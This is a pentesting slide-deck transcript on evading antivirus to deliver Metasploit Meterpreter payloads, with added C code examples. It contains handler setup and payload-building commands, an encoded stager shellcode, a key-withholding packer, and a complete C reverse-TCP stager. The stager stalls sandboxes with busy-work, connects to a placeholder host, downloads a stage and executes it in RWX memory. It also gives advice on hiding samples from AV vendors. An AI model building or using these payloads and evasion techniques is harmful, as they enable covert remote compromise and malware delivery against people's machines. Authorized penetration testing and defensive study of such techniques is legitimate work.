Anti-Virus Evasion Deuce
January 3, 2014
Joe Testa

Anti-Virus Got Better

Last January I gave a talk on AV evasion and showed how to craft a custom Meterpreter payload. Some AV products catch that now! This presentation shows how to get back in business.

Anti-Virus Got Better

A lot of built-in exploits don't work anymore because of AV: the exploit itself still lands, but the Metasploit payload it delivers gets caught, so you now have to re-write that part yourself. Example: unprotected Tomcat installations can be taken over with the tomcat_mgr_deploy module. Without AV, you normally get SYSTEM or root. With AV, you get disappointment.
Goals

Aside from bypassing AV for software exploits, pentesters need a way to conduct social engineering. Ideally, we would like a reliable way to generate EXE files that run Meterpreter when the user is tricked into launching them. You can write your own custom code, but then how do you safely and reliably steal hashes, hijack tokens, etc.? Meterpreter already does all of that; the problem is getting it to run.

Payload Overview

Usually, the EXE doesn't contain Meterpreter itself. It's a stager, whose only job is to connect back to your Metasploit server and execute whatever it returns. For the last two years, pretty much all the Metasploit stagers get caught, no matter how much you encode them: the encoders were built to avoid bad characters, not AV, and the signatures key on the stager's fixed logic and the EXE template around it rather than on the encoded bytes.
Payload Server

The server is set up with:

    msf > use exploit/multi/handler
    msf exploit(handler) > set LHOST
    LHOST =>
    msf exploit(handler) > set LPORT 443
    LPORT => 443
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set ExitOnSession false
    ExitOnSession => false
    msf exploit(handler) > exploit -j
    [*] Exploit running as background job.
    [*] Started reverse handler on
    [*] Starting the payload handler...

ExitOnSession false together with exploit -j keeps the handler listening after the first session comes in, so every user who runs the EXE gets their own session.
IDS/IPS Evasion

An interesting trick to confuse network IDS/IPS is to encode the payload as it travels over the network. One way is to set StageEncoder on the server, which encodes the Meterpreter stage itself before it is sent back to the stager. You can use shikata_ga_nai, etc. Last I checked, this is very slow! Another way is to use the windows/meterpreter/reverse_tcp_rc4 payload, where you set an RC4 key (RC4PASSWORD) and the stage is sent encrypted. Keep in mind that the key is baked into the stager, so this hides the stage from signature matching on the wire; it is not confidentiality against anyone who has the EXE.
Simple Payloads

The most basic way to create an EXE is like this:

    $ msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 X > payload.exe
    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/meterpreter/reverse_tcp
     Length: 290
    Options: {"LHOST"=>"", "LPORT"=>"443"}
    $ ls -l payload.exe
    -rw-r--r-- 1 jdog jdog 73802 Jan  2 20:57 payload.exe
    $ file payload.exe
    payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows

Simple Payloads

Up until August 2011, you could bypass AV by encoding like so:

    $ msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R | msfencode -a x86 -t exe -e x86/shikata_ga_nai -c 9 -o payload.exe
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    [*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)
    [*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)
    [*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)
    [*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)
Simple Payloads

Last year I talked about shellcodeexec (https://github.com/inquisb/shellcodeexec). The punchline is that it takes alphanumeric-encoded shellcode on the command line, stuffs it into executable memory, and executes it:

    C:\Documents and Settings\root>sce.exe PYIIIIIIIIIIIIIIII7Q
    ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsPnizE4qn2RDNkP
    RvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJaxOdMWq
    ZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc
    1yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT
    45ZBShNkf8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV
    9qJrqkOIpshCoqJnkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIo
    jumhZ0GqUPGpVIYTF4bpPhq9K0BK30iozuF0f0p

(The shellcode is one argument; the line breaks are the slide's wrapping.)

Formerly Good Payload

Here's how the alphanumeric shellcode is created. BufferRegister=EAX tells the alpha_mixed decoder that shellcodeexec has left the address of the buffer in EAX:

    $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST= R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
    [*] x86/alpha_mixed succeeded with size 634 (iteration=1)
    PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsP
    nizE4qn2RDNkPRvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJa
    xOdMWqZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc1
    yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT45ZBShNk
    f8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV9qJrqkOIpshCoqJ
    nkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIojumhZ0GqUPGpVIYTF4bpPh
    q9K0BK30iozuF0f0pPf03pbpSpf03XIz4OYOYpIoKeLWPj7uE85Q7rWswtphvbWpdQ
    slNi8fCZB0cfPWrHoiOURTcQKOXUK5YP0tflIorn5XrUZLCXzPMeORsfIoN5qz30qz
    s4cf67ax32JyyXsoIoYELKWFSZQP0huPb0UPWpcfbJePe8BxOTbs8eIoiEmCbs3Zc0
    Bv3crwbHER9I8HqOkOZuva8CtiJfLEKFrUjLXCAA

Formerly Good Payload

Microsoft Security Essentials catches this!
Better Payloads

There is a tool called pyinjector which reimplements the essentials of shellcodeexec in Python: it creates a writable and executable memory buffer, stuffs the shellcode into it, and executes it. You then use pyinstaller (http://www.pyinstaller.org/) to turn the script into an EXE. Available at: https://www.trustedsec.com/files/pyinjector.zip

Better Payloads

There is a tool called Hyperion which encrypts an EXE with AES-128 but deliberately throws away part of the key. The output EXE brute-forces the missing part on startup, so there is no complete key in the binary for AV to extract and decrypt the payload with. http://www.nullsecurity.net/tools/binary/Hyperion-1.0.zip The weakness is that the decryption stub is static, so it can be signatured on its own. It is open source though, so the stub can be changed...
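To make the "brute-force part of the key" idea concrete, here is an added example in C of the mechanism; it is not Hyperion's code. The packer encrypts the payload under a 6-byte key and then forgets the last two bytes; the stub recovers them at run time by trial decryption until a stored checksum of the plaintext matches. Everything specific here is an assumption of this example, not Hyperion's format: a tiny xorshift32 keystream stands in for AES-128 so it builds without a crypto library, the key layout (4 bytes kept, 2 dropped), the FNV-1a checksum used both as seed and as the known-plaintext check, and the constructed sample payload.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define KEY_LEN 6   /* assumed key layout: KEY_LEN - DROPPED bytes stay in the stub */
#define DROPPED 2   /* trailing key bytes the packer throws away: 2^16 trials at startup */

/* FNV-1a: seeds the keystream and doubles as the plaintext checksum the stub checks. */
static uint32_t fnv1a(const uint8_t *p, size_t n) {
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < n; i++) { h ^= p[i]; h *= 16777619u; }
    return h;
}

/* Stand-in stream cipher (xorshift32 keystream XORed over buf). Symmetric, so one
   call both encrypts and decrypts. NOT AES and NOT secure; it only models
   "a cipher keyed by a short secret" so the brute-force step can be shown. */
static void stream_xor(uint8_t *buf, size_t n, const uint8_t *key) {
    uint32_t x = fnv1a(key, KEY_LEN) | 1u;       /* xorshift needs a non-zero state */
    for (size_t i = 0; i < n; i++) {
        if (i % 4 == 0) { x ^= x << 13; x ^= x >> 17; x ^= x << 5; }
        buf[i] ^= (uint8_t)(x >> (8 * (i % 4)));
    }
}

/* What the packed binary carries: the partial key, a checksum of the plaintext,
   and the ciphertext. The dropped key bytes exist nowhere in the file. */
typedef struct {
    uint8_t  key_prefix[KEY_LEN - DROPPED];
    uint32_t plain_sum;
    size_t   len;
    uint8_t *data;
} packed_t;

/* Packer side: encrypt under the full key, then keep only the prefix. */
packed_t pack(const uint8_t *plain, size_t len, const uint8_t full_key[KEY_LEN]) {
    packed_t p;
    memcpy(p.key_prefix, full_key, KEY_LEN - DROPPED);
    p.plain_sum = fnv1a(plain, len);
    p.len = len;
    p.data = malloc(len);
    memcpy(p.data, plain, len);
    stream_xor(p.data, len, full_key);
    return p;
}

/* Stub side: try every value of the dropped bytes until the checksum matches.
   Returns the recovered plaintext (caller frees) or NULL; *trials reports the work. */
uint8_t *unpack(const packed_t *p, uint32_t *trials) {
    uint8_t key[KEY_LEN];
    uint8_t *out = malloc(p->len);
    memcpy(key, p->key_prefix, KEY_LEN - DROPPED);
    for (uint32_t guess = 0; guess < (1u << (8 * DROPPED)); guess++) {
        for (int i = 0; i < DROPPED; i++)
            key[KEY_LEN - DROPPED + i] = (uint8_t)(guess >> (8 * i));
        memcpy(out, p->data, p->len);
        stream_xor(out, p->len, key);
        if (trials) *trials = guess + 1;
        if (fnv1a(out, p->len) == p->plain_sum) return out;
    }
    free(out);
    return NULL;
}

int main(void) {
    /* constructed stand-in for a PE image; any bytes would do */
    uint8_t payload[] = "MZ\x90\x00 constructed stand-in for a PE image";
    uint8_t key[KEY_LEN] = {0x13, 0x37, 0xca, 0xfe, 0xbe, 0xef};   /* assumed key */
    packed_t p = pack(payload, sizeof payload, key);
    uint32_t trials = 0;
    uint8_t *plain = unpack(&p, &trials);
    int ok = plain != NULL && memcmp(plain, payload, sizeof payload) == 0;
    printf("recovered=%d after %u trial decryptions\n", ok, trials);
    free(plain);
    free(p.data);
    return ok ? 0 : 1;
}
```

The point of the construction is cost, not secrecy: the stub does the same work a scanner would have to do, so an engine with a per-file time budget gives up before the payload is in the clear, while the real program just starts a fraction of a second late. Dropping more key bytes raises the scanner's cost and the startup delay together (each extra byte multiplies both by 256). It does nothing against a signature on the stub itself, which is the slide's point about Hyperion's static decryption code.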
Best Payloads

The Veil project is a toolkit for creating payloads that evade AV: https://www.veil-evasion.com/ It is a relatively new project, but is actively maintained and developed. It currently has 22 payloads.

Best Payloads

Current Veil payloads:

    c/meterpreter/rev_tcp
    c/meterpreter/rev_tcp_service
    c/shellcode_inject/virtual
    c/shellcode_inject/void
    cs/meterpreter/rev_tcp
    cs/shellcode_inject/base64_substitution
    cs/shellcode_inject/virtual
    native/Hyperion
    native/backdoor_factory
    native/pe_scrambler
    powershell/shellcode_inject/download_virtual
    powershell/shellcode_inject/psexec_virtual
    powershell/shellcode_inject/virtual
    python/meterpreter/rev_http_contained
    python/meterpreter/rev_https_contained
    python/meterpreter/rev_tcp
    python/shellcode_inject/aes_encrypt
    python/shellcode_inject/arc_encrypt
    python/shellcode_inject/base64_substitution
    python/shellcode_inject/des_encrypt
    python/shellcode_inject/flat
    python/shellcode_inject/letter_substitution

Best Payloads

Veil and the others seem very useful, but being open source is a bit of a weakness when it comes to AV evasion: the vendors can read the generator too. This is the same problem that Metasploit has. Nothing beats writing something yourself! The best method is to take what's out there, customize it, and keep it private.
Best Payloads

A blog post on the Veil homepage pointed to information on how to make your own Meterpreter stager. With shellcodeexec, the idea was to launch the generated stager, which connects to the server, downloads Meterpreter, and executes it:

    shellcodeexec → alphanumeric-encoded stager → Meterpreter

Why not write your own stager from scratch?

Best Payloads

Someone showed how to write your own windows/meterpreter/reverse_tcp equivalent: https://github.com/rsmudge/metasploit-loader Basically, you open a TCP connection to the Metasploit server, read the 4-byte length it sends followed by the stage, and put those bytes into a readable, writable and executable buffer. Prepend the buffer with a "mov edi, <socket handle>" instruction (opcode BF plus a 32-bit immediate) and jump to it. Meterpreter looks in edi for the socket and then uses the existing TCP session.

Best Payloads

How do you customize it? One of the Metasploit developers mentioned that AV puts new binaries into a sandbox for the first N seconds. Do innocent things in the meantime, like reading the registry, reading some config files, computing digits of pi, etc. Don't sleep to run down the clock! Sandboxes know that trick and skip or shorten Sleep calls; real work is much harder to fast-forward.
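The stager described on the last two slides, as an added example in C written in the style of metasploit-loader (my own code, not that project's): it does real CPU work first (a pi spigot) instead of sleeping, connects back, reads the length-prefixed stage, prepends mov edi, <socket>, and on Windows copies the result into RWX memory and jumps to it, the same mechanism shellcodeexec and pyinjector use. Assumptions: the handler speaks the windows/meterpreter/reverse_tcp stage protocol (4-byte little-endian length, then the stage bytes); LHOST 192.0.2.10 and LPORT 443 are placeholders; the 16 MiB cap on the stage size is arbitrary; and the target is the 32-bit x86 stager, since mov edi, imm32 carries a 32-bit handle. The protocol and buffer-building parts are portable so they can be exercised on any OS; only the final jump is Windows-specific.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#include <windows.h>
typedef SOCKET sock_t;
#else
#include <sys/socket.h>
#include <unistd.h>
typedef int sock_t;
#endif

/* "Look busy" phase: real CPU work rather than Sleep(), which a sandbox can skip.
   Rabinowitz-Wagon spigot; writes up to n decimal digits of pi ("3141...") into out
   (which needs n + 2 bytes) and returns how many digits it produced. */
size_t pi_digits(int n, char *out) {
    if (n <= 0) { out[0] = '\0'; return 0; }
    int len = 10 * n / 3 + 1, nines = 0, predigit = 0;
    int *a = malloc(sizeof(int) * (size_t)len);
    size_t pos = 0;
    for (int i = 0; i < len; i++) a[i] = 2;
    for (int j = 0; j < n; j++) {
        int q = 0;
        for (int i = len; i > 0; i--) {          /* one pass of the mixed-radix carry */
            int x = 10 * a[i - 1] + q * i;
            a[i - 1] = x % (2 * i - 1);
            q = x / (2 * i - 1);
        }
        a[0] = q % 10;
        q /= 10;
        if (q == 9) { nines++; continue; }       /* hold 9s until the carry is known */
        if (q == 10) {
            out[pos++] = (char)('0' + predigit + 1);
            for (; nines > 0; nines--) out[pos++] = '0';
            predigit = 0;
        } else {
            out[pos++] = (char)('0' + predigit);
            for (; nines > 0; nines--) out[pos++] = '9';
            predigit = q;
        }
    }
    out[pos++] = (char)('0' + predigit);
    out[pos] = '\0';
    free(a);
    memmove(out, out + 1, pos);                  /* the spigot's first output is always a placeholder 0 */
    return pos - 1;
}

/* Read exactly n bytes from the socket, or fail. */
static int recv_all(sock_t s, uint8_t *buf, size_t n) {
    while (n > 0) {
        int r = recv(s, (char *)buf, (int)n, 0);
        if (r <= 0) return -1;
        buf += r;
        n -= (size_t)r;
    }
    return 0;
}

/* Stage protocol: the handler sends a 4-byte little-endian length, then the stage.
   Returns a malloc'd buffer of len + 5 bytes: "mov edi, <socket>" (BF imm32) first,
   so the stage reuses this connection, followed by the stage itself. */
uint8_t *fetch_stage(sock_t s, uint32_t *out_len) {
    uint8_t hdr[4];
    if (recv_all(s, hdr, 4) != 0) return NULL;
    uint32_t len = (uint32_t)hdr[0] | (uint32_t)hdr[1] << 8 |
                   (uint32_t)hdr[2] << 16 | (uint32_t)hdr[3] << 24;
    if (len == 0 || len > 16u * 1024 * 1024) return NULL;   /* arbitrary sanity cap */
    uint8_t *buf = malloc(len + 5);
    if (buf == NULL) return NULL;
    uint32_t h = (uint32_t)s;                    /* 32-bit x86 stager: the handle fits in edi */
    buf[0] = 0xBF;
    for (int i = 0; i < 4; i++) buf[1 + i] = (uint8_t)(h >> (8 * i));
    if (recv_all(s, buf + 5, len) != 0) { free(buf); return NULL; }
    *out_len = len + 5;
    return buf;
}

#ifdef _WIN32
/* Copy the prepared buffer into RWX memory and jump to it. The stage does not return. */
static void run_stage(const uint8_t *code, uint32_t len) {
    void *mem = VirtualAlloc(NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (mem == NULL) return;
    memcpy(mem, code, len);
    ((void (*)(void))mem)();
}

int main(void) {
    char scratch[64];
    WSADATA wsa;
    struct sockaddr_in sa;
    pi_digits(40, scratch);                      /* burn real time before touching the network */
    WSAStartup(MAKEWORD(2, 2), &wsa);
    SOCKET s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(443);                    /* LPORT: placeholder */
    sa.sin_addr.s_addr = inet_addr("192.0.2.10"); /* LHOST: placeholder (TEST-NET-1) */
    if (connect(s, (struct sockaddr *)&sa, sizeof sa) == 0) {
        uint32_t n;
        uint8_t *stage = fetch_stage(s, &n);
        if (stage != NULL) run_stage(stage, n);
    }
    return 1;
}
#endif
```

Two design points. The handle goes into edi because that is the register the Meterpreter stage reads its socket from; if you change the stager's calling convention you must change the stage too, which is why the prefix is a fixed BF imm32 rather than anything cleverer. And the busy-work runs before the connect, since the callback is the observable event a sandbox is waiting for; the work should be something a legitimate program might plausibly do, not a loop a heuristic can recognise as stalling.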
VirusTotal

VirusTotal (http://www.virustotal.com/) lets you upload binaries to be scanned by 46 AV products. It's common knowledge that they pass samples on to AV vendors. They know malware authors use it. Your target can pull down a signature for your payload in as little as one hour.

VirusTotal

vt-notify (https://github.com/mubix/vt-notify) uses the VirusTotal API to check the SHA-1 hash of your payload without uploading the file. If you don't get your own API key, it uses a built-in one. It's been incorporated into Veil. Asking about a hash nobody has ever submitted probably tips them off that it's malware! Actually... this functionality as a whole was probably designed as a trap!
Building an AV Lab

The best way to check your payload is by building your own AV lab. VirusTotal has 46 products, but how many corporate environments use "Kingsoft AV"? Symantec and McAfee seem to have the overwhelming market share. Maybe throw in Kaspersky for good measure too...

Building an AV Lab

An MSDN Operating Systems subscription is $700 for 1 year. Symantec Small Business Edition costs $60 for a 3 year subscription for 1 endpoint. McAfee SaaS Endpoint Protection costs $52. Make sure the AV products don't phone home! Otherwise your test samples end up at the vendor, which is the same problem as uploading them to VirusTotal.

Building an AV Lab

I'm now actively building this lab. Once it's set up, I'm going to evaluate all these evasion tools. If anyone wants to test some payloads, just let me know!

Conclusion

To be a good pentester, you need to know how to bypass AV. Many built-in Metasploit modules no longer work. You have to re-write some or find alternatives. The success of your engagement can depend entirely upon how well you can adapt. Being a programmer is extremely valuable!